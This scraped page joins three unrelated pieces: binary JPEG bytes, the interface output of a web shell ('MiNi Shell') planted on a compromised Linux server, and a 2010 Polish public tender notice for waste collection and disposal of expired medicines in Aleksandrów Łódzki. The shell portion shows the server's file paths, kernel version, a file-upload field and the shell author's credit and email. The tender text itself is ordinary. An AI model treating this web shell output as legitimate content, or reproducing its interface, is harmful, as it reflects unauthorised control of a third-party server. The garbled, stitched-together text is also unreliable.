JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100617/173090-N-2010.html

<p class="kh_header"><b>Aleksandrów Łódzki: Wykonanie usługi zagospodarowania odpadów komunalnych na terenie gminy Aleksandrów Łódzki oraz usługi polegającej na odbieraniu, transporcie i unieszkodliwianiu przeterminowanych leków składanych przez mieszkańców do specjalnych pojemników wstawionych do aptek na terenie gminy Aleksandrów Łódzki</b><br>
<b>Numer ogłoszenia: 173090 - 2010; data zamieszczenia: 17.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Aleksandrów Łódzki , Pl. Kościuszki 2, 95-070 Aleksandrów Łódzki, woj. łódzkie, tel. 042 7121018, 7121620, faks 042 7121780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aleksandrow-lodzki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi zagospodarowania odpadów komunalnych na terenie gminy Aleksandrów Łódzki oraz usługi polegającej na odbieraniu, transporcie i unieszkodliwianiu przeterminowanych leków składanych przez mieszkańców do specjalnych pojemników wstawionych do aptek na terenie gminy Aleksandrów Łódzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  niniejszego zamówienia jest wykonanie usług polegających na:
3.1.Systematycznym opróżnianiu koszy ulicznych i pojemników do zbiórki niesegregowanych odpadów komunalnych ustawionych na terenach administrowanych przez Gminę Aleksandrów Łódzki oraz odbiorze i przekazywaniu do odzysku opakowań z tworzyw sztucznych typu PET, szkła oraz papieru, zbieranych selektywnie do przeznaczonych do tego i oznakowanych pojemników. Odbierane odpady należą do grupy 20 wg katalogu odpadów - część I przedmiotu zamówienia
Zakres usługi:
a 	opróżnianie koszy ulicznych oraz pojemników na niesegregowane odpady komunalne z częstotliwością wynikającą z potrzeb, jednakże w przypadku koszy ulicznych nie rzadziej niż 2 razy w tygodniu, natomiast pojemników na odpady niesegregowane nie rzadziej niż 1 raz na dwa tygodnie;
b 	opróżnianie koszy ulicznych zlokalizowanych przy ul. Wojska Polskiego i w parku miejskim przy Placu Kościuszki nie rzadziej niż 3 razy w tygodniu (w tym jeden raz  w sobotę);
c 	bieżąca kontrola stopnia zapełniania pojemników na odpady opakowaniowe z tworzyw typu PET, stłuczkę szklaną i papier oraz sukcesywne odbieranie tych odpadów, nie dopuszczając do przepełnienia pojemników;
d 	przekazywanie odbieranych odpadów uprawnionym odbiorcom w celu ich unieszkodliwiania bądź odzysku;
e 	bieżąca konserwacja pojemników oraz uprzątanie terenu w otoczeniu pojemników po każdorazowym ich opróżnieniu,
f 	ustawienie 4 sztuk pojemników na odpady o pojemności 1.100 L. we wskazanych w załączniku nr 4 miejscach.
3.1.1.Wykaz i rozmieszczenie koszy ulicznych, pojemników na odpady komunalne z terenów gminnych oraz pojemników do selektywnej zbiórki odpadów typu PET, szkła i papieru zawiera załącznik nr 5 do siwz 
3.1.2.Wykonawca usługi opisanej w punkcie 3.1. jest zobowiązany do wystawienia Zamawiającemu dokumentów potwierdzających wywóz odpadów nagromadzonych w koszach i pojemnikach, w tym również zebranych selektywnie, prowadzenia ilościowej i jakościowej ewidencji odpadów oraz składania Zamawiającemu co najmniej raz w roku - do dnia 31 stycznia roku następnego za
3.1.1.rok poprzedni oraz na każde żądanie informacji o ilości wywiezionych odpadów i sposobie ich zagospodarowania, zgodnie z obowiązującymi przepisami ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. Nr 62, z późn. zm.) i ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz.U. z 2005 r. nr 236 poz. 2008 z późn. zm.)

3.2.Odbieraniu, transporcie i unieszkodliwianiu przeterminowanych leków, sklasyfiko-wanych jako odpady o kodach 200131 i 200132, składanych przez mieszkańców do specjalnych pojemników zakupionych przez Urząd Miejski i wstawionych do aptek na terenie gminy Aleksandrów Łódzki. - część II przedmiotu zamówienia

 Zakres usługi:
a) 	odbieranie przeterminowanych leków z pojemników umieszczonych w aptekach z częstotliwością nie mniejszą niż co 2 miesiące;
b) 	każdorazowe ważenie na miejscu odbieranych leków oraz wystawianie kart przekazania odpadów (lub zbiorczej z wyszczególnieniem ilości w poszczególnych punktach zbiórki);
c) 	w przypadku wcześniejszego zapełnienia pojemnika, opróżnienie go w terminie 14 dni od daty zawiadomienia przez Zamawiającego lub aptekę. 
3.1.Wykaz aptek i punktów aptecznych, w których prowadzona będzie zbiórka przeterminowanych leków stanowi załącznik nr 6 do siwz
3.2.Wykonawca zobowiązuje się w ramach zamówienia opisanego w punkcie 3.1. do nieodpłatnego wstawienia na żądanie Zamawiającego we wskazanych miejscach na terenach wiejskich i w mieście własnych pojemników do selektywnej zbiórki odpadów z tworzyw sztucznych, papieru i szkła..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>powtórzenie tego sameg rodzaju usług o wartości nie przekraczającej 50 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.53.30.00-2, 90.52.40.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)decyzję zezwalającą na odbieranie i transport odpadów o kodach z grupy 20 katalogu odpadów objętych zamówieniem opisanym w punkcie 3.1. ( I część)  SIWZ, a o kodach 200131 i 200132 lub 180108 i 180109 - w odniesieniu do zamówienia opisanego w punkcie 3.2. (II część) SIWZ- aktualną na dzień upływu terminu składania ofert,
b)zezwolenie Burmistrza Aleksandrowa Łódzkiego na prowadzenie na terenie gminy Aleksandrów Łódzki działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (art. 7 ust. 1 pkt. 1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach t.j. Dz.U. z 2005 r. nr 236 poz. 2008 r. z póżn. zm.) - aktualne na dzień upływu terminu składania ofert lub promesę wydania zezwolenia - w odniesieniu do zamówienia opisanego w punkcie 3.1. (I część)  SIWZ.
Na potwierdzenie warunków opisanych w rozdziale 5 pkt. 1.1. pppkt. a i b wykonawca składa:
a)  zezwolenie w formie decyzji na prowadzenie działalności w zakresie odbierania odpadów komunalnych od  właścicieli nieruchomości (art. 7 ust 1 pkt 1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach Dz.U. Z 1996 r. Nr 132 poz 622 z póżn. zm) wydane przez Burmistrza Gminy Aleksandrów Łódzki, aktualne na dzień upływu terminu składania ofert lub promesę wydania zezwolenia dla zamówienia opisanego w punkce 3.1. ( część I).
b)    zezwolenie lub zezwolenia właściwego starosty, w formie decyzji, na potwierdzenie działalności w zakresie zbierania i transportu odpadów (art. 28 ust. 3 pkt 2 w związku z art. 28 ust 1 ustawy z dnia 27 kwietnia 2001 r. o odpadach Dz. U z 2001 r. Nr 62 poz. 628 z pżn zm)  - aktualne na dzień upływu terminu składania ofert  lub promesę wydania zezwolenia dla zamówienia opisanego w punkcie 3.1. i 3.2. ( część I i II)
c)    zezwolenie na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów - zgodnie z wymaganiami art. 26 ust. 1 ustawy o odpadach (Dz.U. z 1996 r. Nr 132 oz. 622 z póżń. zm.) lub umowę z innym podmiotem posiadającym przedmiotowe zezwolenie, potwierdzającą przyjmowanie odpadów zebranych przez  Wykonawcę, wraz z kserokopią zezwolenia potwierdzoną za zgodność z oryginałem - dla zamówienia opisanego w punkcie 3.1. i 3.2. ( część I i II)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 u.p.z.p. - wg. zał. nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 u.p.z.p. - wg. zał. nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 u.p.z.p. - wg. zał. nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 u.p.z.p. - wg. zał. nr 2 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aleksandrow-lodzki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Aleksandrowie Łódzkim, Plac Kościuszki 2, bud. C okój nr 14a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2010 godzina 11:00, miejsce: Urząd Miejski w Aleksandrowie Łódzkim, Plac Kościuszki 2, Ratusz, punkt podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie usługi zagospodarowania odpadów komunalnych na terenie gminy Aleksandrów Łódzki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1.Systematycznym opróżnianiu koszy ulicznych i pojemników do zbiórki niesegregowanych odpadów komunalnych ustawionych na terenach administrowanych przez Gminę Aleksandrów Łódzki oraz odbiorze i przekazywaniu do odzysku opakowań z tworzyw sztucznych typu PET, szkła oraz papieru, zbieranych selektywnie do przeznaczonych do tego i oznakowanych pojemników. Odbierane odpady należą do grupy 20 wg katalogu odpadów - część I przedmiotu zamówienia
Zakres usługi:
a 	opróżnianie koszy ulicznych oraz pojemników na niesegregowane odpady komunalne z częstotliwością wynikającą z potrzeb, jednakże w przypadku koszy ulicznych nie rzadziej niż 2 razy w tygodniu, natomiast pojemników na odpady niesegregowane nie rzadziej niż 1 raz na dwa tygodnie;
b 	opróżnianie koszy ulicznych zlokalizowanych przy ul. Wojska Polskiego i w parku miejskim przy Placu Kościuszki nie rzadziej niż 3 razy w tygodniu (w tym jeden raz  w sobotę);
c 	bieżąca kontrola stopnia zapełniania pojemników na odpady opakowaniowe z tworzyw typu PET, stłuczkę szklaną i papier oraz sukcesywne odbieranie tych odpadów, nie dopuszczając do przepełnienia pojemników;
d 	przekazywanie odbieranych odpadów uprawnionym odbiorcom w celu ich unieszkodliwiania bądź odzysku;
e 	bieżąca konserwacja pojemników oraz uprzątanie terenu w otoczeniu pojemników po każdorazowym ich opróżnieniu,
f 	ustawienie 4 sztuk pojemników na odpady o pojemności 1.100 L. we wskazanych w załączniku nr 4 miejscach.
3.1.1.Wykaz i rozmieszczenie koszy ulicznych, pojemników na odpady komunalne z terenów gminnych oraz pojemników do selektywnej zbiórki odpadów typu PET, szkła i papieru zawiera załącznik nr 5 do siwz 
3.1.2.Wykonawca usługi opisanej w punkcie 3.1. jest zobowiązany do wystawienia Zamawiającemu dokumentów potwierdzających wywóz odpadów nagromadzonych w koszach i pojemnikach, w tym również zebranych selektywnie, prowadzenia ilościowej i jakościowej ewidencji odpadów oraz składania Zamawiającemu co najmniej raz w roku - do dnia 31 stycznia roku następnego za
3.1.1.rok poprzedni oraz na każde żądanie informacji o ilości wywiezionych odpadów i sposobie ich zagospodarowania, zgodnie z obowiązującymi przepisami ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. Nr 62, z późn. zm.) i ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz.U. z 2005 r. nr 236 poz. 2008 z późn. zm.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.53.30.00-2, 90.52.40.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> usługi polegającej na odbieraniu, transporcie i unieszkodliwianiu przeterminowanych leków składanych przez mieszkańców do specjalnych pojemników wstawionych do aptek na terenie gminy Aleksandrów Łódzki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1.Odbieraniu, transporcie i unieszkodliwianiu przeterminowanych leków, sklasyfiko-wanych jako odpady o kodach 200131 i 200132, składanych przez mieszkańców do specjalnych pojemników zakupionych przez Urząd Miejski i wstawionych do aptek na terenie gminy Aleksandrów Łódzki. - część II przedmiotu zamówienia

 Zakres usługi:
a) 	odbieranie przeterminowanych leków z pojemników umieszczonych w aptekach z częstotliwością nie mniejszą niż co 2 miesiące;
b) 	każdorazowe ważenie na miejscu odbieranych leków oraz wystawianie kart przekazania odpadów (lub zbiorczej z wyszczególnieniem ilości w poszczególnych punktach zbiórki);
c) 	w przypadku wcześniejszego zapełnienia pojemnika, opróżnienie go w terminie 14 dni od daty zawiadomienia przez Zamawiającego lub aptekę. 
3.2.Wykaz aptek i punktów aptecznych, w których prowadzona będzie zbiórka przeterminowanych leków stanowi załącznik nr 6 do siwz
3.3.Wykonawca zobowiązuje się w ramach zamówienia opisanego w punkcie 3.1. do nieodpłatnego wstawienia na żądanie Zamawiającego we wskazanych miejscach na terenach wiejskich i w mieście własnych pojemników do selektywnej zbiórki odpadów z tworzyw sztucznych, papieru i szkła..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.53.30.00-2, 90.52.40.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com